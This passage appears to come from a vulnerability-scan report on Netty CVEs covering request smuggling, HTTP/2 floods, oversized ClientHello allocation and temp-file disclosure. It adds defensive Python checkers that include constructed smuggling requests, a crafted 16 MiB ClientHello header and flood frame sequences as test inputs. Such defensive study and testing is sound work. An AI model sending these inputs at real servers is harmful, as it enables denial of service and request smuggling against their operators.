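    """Per-connection budget for HTTP/2 frames that cost the server work
    without advancing any request. on_frame() returns True when the
    connection should be torn down (send GOAWAY, close the socket)."""

    def __init__(self, max_no_progress=100, max_resets=100, window_s=10.0,
                 clock=time.monotonic):
        self.max_no_progress = max_no_progress   # consecutive idle frames tolerated
        self.max_resets = max_resets             # RST_STREAM per window, sent or received
        self.window_s = window_s
        self.clock = clock
        self.no_progress = 0
        self.resets = deque()                    # timestamps of recent resets

    def _count_reset(self):
        now = self.clock()
        self.resets.append(now)
        while self.resets and now - self.resets[0] > self.window_s:
            self.resets.popleft()
        return len(self.resets) > self.max_resets

    def on_local_reset(self):
        """Call when this side sends RST_STREAM, e.g. for an invalid request
        (CVE-2019-9514): a peer that provokes resets is as costly as one
        that sends them."""
        return self._count_reset()

    def on_frame(self, ftype, payload_len, end_stream=False, ack=False):
        if ftype == "RST_STREAM" and self._count_reset():
            return True                          # CVE-2023-44487 rapid reset
        if ftype in ("DATA", "HEADERS", "CONTINUATION", "PUSH_PROMISE"):
            productive = payload_len > 0 or end_stream   # CVE-2019-9518: empty frames
        elif ftype in ("PING", "SETTINGS"):
            productive = ack                     # CVE-2019-9512/9515: each non-ACK queues a reply
        elif ftype == "RST_STREAM":
            productive = False
        else:
            return False                         # WINDOW_UPDATE, PRIORITY, GOAWAY: not budgeted here
        if productive:
            self.no_progress = 0
            return False
        self.no_progress += 1
        return self.no_progress > self.max_no_progress


class SimClock:
    """Deterministic stand-in for time.monotonic() in the simulation."""

    def __init__(self):
        self.t = 0.0

    def __call__(self):
        return self.t

    def advance(self, seconds):
        self.t += seconds


def frames_until_goaway(frames, **guard_kwargs):
    """Feed (type, payload_len, end_stream, ack) tuples to a fresh guard and
    return the 1-based index of the frame that tripped it, or None."""
    guard = FloodGuard(**guard_kwargs)
    for i, (ftype, plen, end_stream, ack) in enumerate(frames, 1):
        if guard.on_frame(ftype, plen, end_stream, ack):
            return i
    return None


# Constructed frame sequences (not captured traffic).
PING_FLOOD = [("PING", 8, False, False)] * 500
EMPTY_DATA_FLOOD = [("DATA", 0, False, False)] * 500
RAPID_RESET = [("HEADERS", 40, False, False), ("RST_STREAM", 4, False, False)] * 200
CHATTY_BUT_HONEST = [("HEADERS", 40, True, False), ("PING", 8, False, False)] * 300

if __name__ == "__main__":
    for name, seq in [("ping flood", PING_FLOOD), ("empty DATA flood", EMPTY_DATA_FLOOD),
                      ("rapid reset", RAPID_RESET), ("honest client", CHATTY_BUT_HONEST)]:
        print("%-17s GOAWAY at frame %s" % (name, frames_until_goaway(seq, clock=SimClock())))
```

Two design points matter more than the exact thresholds: the no-progress counter resets only on frames that carry request data or end a stream, so an attacker cannot launder a flood by interleaving cheap ACKs, and resets the server itself had to send count against the same window as resets it received, because the work is the same either way.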
CVE-2021-43797
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty prior to version 4.1.71.Final skips control characters when they are present at the beginning or end of a header name. It should instead fail fast, as these are not allowed by the spec and can lead to HTTP request smuggling. Skipping the validation lets Netty "sanitize" header names before forwarding them to another remote system when used as a proxy; that system can no longer see the invalid usage and therefore does not do the validation itself. Users should upgrade to version 4.1.71.Final.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
References: none listed in the report
Vulnerable Software & Versions:
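CVE-2019-16869, CVE-2019-20444, CVE-2019-20445 and CVE-2021-43797 are one class of bug: a lenient decoder repairs an ambiguous header and forwards something cleaner than it received, so the next hop never sees the ambiguity and the two hops can disagree on where one request ends and the next begins. Below is an added example, not code from the report or from Netty, of the strict checks the fixed decoders apply, written in Python over raw HTTP/1.1 bytes; the sample requests are constructed for the illustration.

```python
import re

# RFC 7230 "tchar": the only bytes permitted in a header field name.
# Whitespace before the colon (CVE-2019-16869) and control characters at
# either end of the name (CVE-2021-43797) both fail this test; a lenient
# decoder that strips them and forwards the cleaned header is the bug.
_TCHAR = re.compile(rb"^[!#$%&'*+.^_`|~0-9A-Za-z-]+$")


class SmugglingRisk(ValueError):
    """The message has no single body framing every peer would agree on."""


def parse_headers(raw):
    """Split a raw request head into (lower-cased name, value) pairs,
    failing fast on any header name that is not a valid token."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:                       # lines[0] is the request line
        name, sep, value = line.partition(b":")
        if not sep:
            raise SmugglingRisk("header line without ':' %r" % line)
        if not _TCHAR.match(name):
            raise SmugglingRisk("invalid header name %r" % name)
        headers.append((name.lower(), value.strip(b" \t")))
    return headers


def framing(headers):
    """Return 'chunked', 'content-length=<n>' or 'none'; raise on ambiguity.
    Follows RFC 7230 section 3.3.3, taking the strictest option it permits."""
    cls = [v for n, v in headers if n == b"content-length"]
    tes = [v for n, v in headers if n == b"transfer-encoding"]
    if cls and tes:                              # CVE-2019-20444 / CVE-2019-20445
        raise SmugglingRisk("Content-Length together with Transfer-Encoding")
    if len(cls) > 1:                             # CVE-2019-20445: second Content-Length
        raise SmugglingRisk("repeated Content-Length %r" % cls)
    if tes:
        codings = [c.strip().lower() for v in tes for c in v.split(b",")]
        if codings[-1] != b"chunked":
            raise SmugglingRisk("Transfer-Encoding does not end in chunked")
        return "chunked"
    if cls:
        if not cls[0].isdigit():
            raise SmugglingRisk("non-numeric Content-Length %r" % cls[0])
        return "content-length=%d" % int(cls[0])
    return "none"


def check_request(raw):
    """'ok:<framing>' for a request a proxy may forward, else 'reject:<reason>'."""
    try:
        return "ok:" + framing(parse_headers(raw))
    except SmugglingRisk as exc:
        return "reject:" + str(exc)


# Constructed sample requests (not captured traffic), one per reported issue.
SAMPLES = {
    "clean":        b"POST / HTTP/1.1\r\nHost: a\r\nContent-Length: 5\r\n\r\nhello",
    "chunked-only": b"POST / HTTP/1.1\r\nHost: a\r\nTransfer-Encoding: gzip, chunked\r\n\r\n0\r\n\r\n",
    "double-cl":    b"POST / HTTP/1.1\r\nHost: a\r\nContent-Length: 5\r\nContent-Length: 50\r\n\r\nhello",
    "cl-and-te":    b"POST / HTTP/1.1\r\nHost: a\r\nContent-Length: 5\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n",
    "space-colon":  b"POST / HTTP/1.1\r\nHost: a\r\nTransfer-Encoding : chunked\r\n\r\n0\r\n\r\n",
    "ctl-in-name":  b"POST / HTTP/1.1\r\nHost: a\r\n\x01Content-Length: 5\r\n\r\nhello",
}

if __name__ == "__main__":
    for label, request in SAMPLES.items():
        print("%-13s %s" % (label, check_request(request)))
```

The rule a proxy should follow is the one the patched decoders implement: when the framing is not unambiguous, answer 400 and close the connection rather than choose an interpretation, because whichever interpretation you choose, an attacker will find a backend that chooses the other.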
CVE-2023-34462
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` allocate 16MB of heap. The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the server name indicated by the `ClientHello` record. For this purpose it allocates a `ByteBuf` using the length value defined in the `ClientHello` record. Normally that value should be smaller than the handshake packet, but no checks are done here and, the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`. This vulnerability has been fixed in version 4.1.94.Final.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3: Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
References: none listed in the report
Vulnerable Software & Versions:
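CVE-2023-34462 is an allocation sized by an attacker-controlled length field: the 24-bit handshake length in a ClientHello can claim up to 16 MiB, and a sniffer that sizes its buffer from that claim pays before it has verified anything. The following is an added example, not code from the report or from Netty, in Python: it reads the TLS record and handshake headers the way an SNI sniffer must, shows the unchecked sizing that trusts the declared length, and the checked version that refuses before allocating. The 16 KiB cap is an assumption chosen for the illustration (Netty's own limit is not stated on this page), and the ClientHello builder exists only to produce a sample input.

```python
import struct

HANDSHAKE = 0x16            # TLS record content type
CLIENT_HELLO = 0x01         # handshake message type
EXT_SERVER_NAME = 0x0000    # SNI extension
TLS_RECORD_MAX = 16384      # RFC 5246 / RFC 8446: plaintext record payload <= 2^14
# Illustrative cap (an assumption for this example, not Netty's constant):
# real ClientHellos are hundreds of bytes to a few KB.
MAX_CLIENT_HELLO = 16 * 1024


class Reject(ValueError):
    """Input refused before any buffer is sized from it."""


def declared_sizes(head):
    """Parse the 5-byte record header and 4-byte handshake header an SNI sniffer
    sees first; return (record_len, handshake_len) as the peer declares them."""
    if len(head) < 9:
        raise Reject("need 9 bytes of header")
    ctype, _version, rec_len = struct.unpack("!BHH", head[:5])
    if ctype != HANDSHAKE:
        raise Reject("not a handshake record")
    if head[5] != CLIENT_HELLO:
        raise Reject("not a ClientHello")
    hs_len = int.from_bytes(head[6:9], "big")      # 24-bit field: up to 16 MiB
    return rec_len, hs_len


def bytes_to_buffer_unchecked(head):
    """Pre-fix shape of the bug: size the buffer straight from the declared length."""
    _rec_len, hs_len = declared_sizes(head)
    return hs_len


def bytes_to_buffer(head):
    """Hardened: refuse before allocating when the declared sizes are implausible."""
    rec_len, hs_len = declared_sizes(head)
    if rec_len > TLS_RECORD_MAX:
        raise Reject("record length %d exceeds the TLS maximum" % rec_len)
    if hs_len > MAX_CLIENT_HELLO:
        raise Reject("ClientHello declared as %d bytes, cap is %d" % (hs_len, MAX_CLIENT_HELLO))
    return hs_len


def is_rejected(head):
    """True if the hardened check refuses this header."""
    try:
        bytes_to_buffer(head)
    except Reject:
        return True
    return False


def server_name(body):
    """Walk a complete ClientHello body (after the handshake header) to the SNI host name."""
    p = 2 + 32                                              # client_version + random
    p += 1 + body[p]                                        # session_id
    p += 2 + int.from_bytes(body[p:p + 2], "big")           # cipher_suites
    p += 1 + body[p]                                        # compression_methods
    if p + 2 > len(body):
        return None
    ext_end = p + 2 + int.from_bytes(body[p:p + 2], "big")
    p += 2
    while p + 4 <= ext_end:
        etype, elen = struct.unpack("!HH", body[p:p + 4])
        p += 4
        if etype == EXT_SERVER_NAME:                        # list_len(2) name_type(1) name_len(2) name
            name_len = int.from_bytes(body[p + 3:p + 5], "big")
            return body[p + 5:p + 5 + name_len].decode("ascii")
        p += elen
    return None


def build_client_hello(host):
    """Minimal TLS 1.2-style ClientHello record with one cipher suite and an SNI extension."""
    name = host.encode("ascii")
    sni = struct.pack("!HBH", len(name) + 3, 0, len(name)) + name
    ext = struct.pack("!HH", EXT_SERVER_NAME, len(sni)) + sni
    body = (b"\x03\x03" + bytes(32) + b"\x00"               # version, random, empty session id
            + struct.pack("!H", 2) + b"\x13\x01"            # one cipher suite
            + b"\x01\x00"                                   # null compression only
            + struct.pack("!H", len(ext)) + ext)
    handshake = bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return struct.pack("!BHH", HANDSHAKE, 0x0301, len(handshake)) + handshake


# Constructed inputs: an honest hello and a header claiming a 16 MiB ClientHello.
HELLO = build_client_hello("example.com")
BOMB_HEAD = (struct.pack("!BHH", HANDSHAKE, 0x0301, TLS_RECORD_MAX)
             + bytes([CLIENT_HELLO]) + (0xFFFFFF).to_bytes(3, "big"))

if __name__ == "__main__":
    print("honest hello: buffer %d bytes, SNI=%s" % (bytes_to_buffer(HELLO[:9]), server_name(HELLO[9:])))
    print("crafted head: unchecked would buffer %d bytes" % bytes_to_buffer_unchecked(BOMB_HEAD))
    print("crafted head: checked rejects it: %s" % is_rejected(BOMB_HEAD))
```

The crafted header costs the attacker nine bytes and, with the unchecked sizing, costs the server a 16 MiB buffer per connection that it will hold until an idle timeout fires, which is exactly why the advisory singles out channels without one.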
CVE-2021-21295
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec` and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1, this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is an HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final. As a workaround, the user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
References:
- [bookkeeper-issues] 20210330 [GitHub] [bookkeeper] eolivelli opened a new issue #2669: Update Netty to 4.1.60.final - [flink-dev] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210426 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210511 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210610 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210618 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. 
thx - [hbase-commits] 20210402 [hbase-thirdparty] branch master updated: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 (#48) - [hbase-dev] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] Apache-HBase commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] HorizonNet commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell merged pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell opened a new pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Assigned] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security 
vulnerability CVE-2021-21295
CONFIRM - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj
CONFIRM - https://security.netapp.com/advisory/ntap-20210604-0003/
DEBIAN - DSA-4885
MISC - https://github.com/Netflix/zuul/pull/980
MISC - https://github.com/netty/netty/commit/89c241e3b1795ff257af4ad6eadc616cb2fb3dc4
MISC - https://www.oracle.com/security-alerts/cpuapr2022.html
OSSINDEX - [CVE-2021-21295] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21295
OSSIndex - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj
OSSIndex - https://lists.apache.org/thread/ztx01jknlcoq0v6pp2cwl609dyzk9r5h
Vulnerable Software & Versions:
CVE-2021-21409
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with the endStream set to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a follow-up of GHSA-wm47-8v5p-wjpj/CVE-2021-21295, which missed this one case. This was fixed as part of 4.1.61.Final.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
References:
Vulnerable Software & Versions:
CVE-2021-21290
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used, local information disclosure can occur via the local system temporary directory if temporarily storing uploads on the disk is enabled. On Unix-like systems, the temporary directory is shared between all users. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems. The method "File.createTempFile" on Unix-like systems creates a random file, but, by default, will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData", which is vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify one's own "java.io.tmpdir" when starting the JVM or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user.
CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions
CVSSv2: Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2022-24823
Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used, local information disclosure can occur via the local system temporary directory if temporarily storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows, as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user.
CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv2: Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
References:
Vulnerable Software & Versions:
grpc-netty-shaded-1.23.0.jar (shaded: io.netty:netty-codec:4.1.38.Final)
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/io.netty/netty-codec/pom.xml
MD5: f86cd9629ef9997dcdfaee79eaa738d9
SHA1: e12715d67d804245f7462124377f8c83e29ece8e
SHA256: eb31c27208618397c01481bb77cbb8ae21fddfde8db84ca6d3437d6469f81891
Referenced In Project/Scope: Simplicite Platform:compile
Evidence
Type     Source  Name               Value          Confidence
Vendor   pom     artifactid         netty-codec    Low
Vendor   pom     groupid            io.netty       Highest
Vendor   pom     name               Netty/Codec    High
Vendor   pom     parent-artifactid  netty-parent   Low
Product  pom     artifactid         netty-codec    Highest
Product  pom     groupid            io.netty       Highest
Product  pom     name               Netty/Codec    High
Product  pom     parent-artifactid  netty-parent   Medium
Version  pom     version            4.1.38.Final   Highest
CVE-2019-20444
HttpObjectDecoder.java in Netty before 4.1.44 allows an HTTP header that lacks a colon, which might be interpreted as a separate header with an incorrect syntax, or might be interpreted as an "invalid fold."
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N
CVSSv3: Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
References:
FEDORA - FEDORA-2020-66b5f85ccc
DEBIAN - DSA-4885
MISC - https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final
MISC - https://github.com/netty/netty/issues/9866
MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2109-1] netty security update
MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2110-1] netty-3.9 security update
MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2364-1] netty security update
MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2365-1] netty-3.9 security update
OSSINDEX - [CVE-2019-20444] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20444
OSSIndex - https://github.com/netty/netty/issues/9866
REDHAT - RHSA-2020:0497
REDHAT - RHSA-2020:0567
REDHAT - RHSA-2020:0601
REDHAT - RHSA-2020:0605
REDHAT - RHSA-2020:0606
REDHAT - RHSA-2020:0804
REDHAT - RHSA-2020:0805
REDHAT - RHSA-2020:0806
REDHAT - RHSA-2020:0811
UBUNTU - USN-4532-1
Vulnerable Software & Versions:
CVE-2019-20445
HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N
CVSSv3: Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
References:
FEDORA - FEDORA-2020-66b5f85ccc
DEBIAN - DSA-4885
MISC - https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final
MISC - https://github.com/netty/netty/issues/9861
MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2109-1] netty security update
MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2110-1] netty-3.9 security update
MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2364-1] netty security update
MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2365-1] netty-3.9 security update
OSSINDEX - [CVE-2019-20445] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20445
OSSIndex - https://github.com/netty/netty/issues/9861
OSSIndex - https://github.com/netty/netty/pull/9865
OSSIndex - https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2@%3Ccommits.druid.apache.org%3E
REDHAT - RHSA-2020:0497
REDHAT - RHSA-2020:0567
REDHAT - RHSA-2020:0601
REDHAT - RHSA-2020:0605
REDHAT - RHSA-2020:0606
REDHAT - RHSA-2020:0804
REDHAT - RHSA-2020:0805
REDHAT - RHSA-2020:0806
REDHAT - RHSA-2020:0811
UBUNTU - USN-4532-1
Vulnerable Software & Versions:
CVE-2019-16869
Netty before 4.1.42.Final mishandles whitespace before the colon in HTTP headers (such as a "Transfer-Encoding : chunked" line), which leads to HTTP request smuggling.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
References:
BUGTRAQ - 20200105 [SECURITY] [DSA 4597-1] netty security update
DEBIAN - DSA-4597
MISC - https://github.com/netty/netty/compare/netty-4.1.41.Final...netty-4.1.42.Final
MISC - https://github.com/netty/netty/issues/9571
MLIST - [debian-lts-announce] 20190930 [SECURITY] [DLA 1941-1] netty security update
MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2110-1] netty-3.9 security update
MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2365-1] netty-3.9 security update
OSSINDEX - [CVE-2019-16869] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-16869
OSSIndex - https://github.com/netty/netty/issues/9571
REDHAT - RHSA-2019:3892
REDHAT - RHSA-2019:3901
REDHAT - RHSA-2020:0159
REDHAT - RHSA-2020:0160
REDHAT - RHSA-2020:0161
REDHAT - RHSA-2020:0164
REDHAT - RHSA-2020:0445
UBUNTU - USN-4532-1
Vulnerable Software & Versions:
CVE-2020-11612
The ZlibDecoders in Netty 4.1.x before 4.1.46 allow for unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free memory to a single decoder.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-37136
The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. Malicious input can trigger an OOME and so a DoS attack.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-37137
The Snappy frame decoder function doesn't restrict the chunk length, which may lead to excessive memory usage. Besides this, it also may buffer reserved skippable chunks until the whole chunk has been received, which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2022-41881
Netty project is an event-driven asynchronous network application framework. In versions prior to 4.1.86.Final, a StackOverflowError can be raised when parsing a malformed crafted message due to an infinite recursion. This issue is patched in version 4.1.86.Final. There is no workaround, except using a custom HaProxyMessageDecoder.
CWE-674 Uncontrolled Recursion
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2023-44487
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-43797
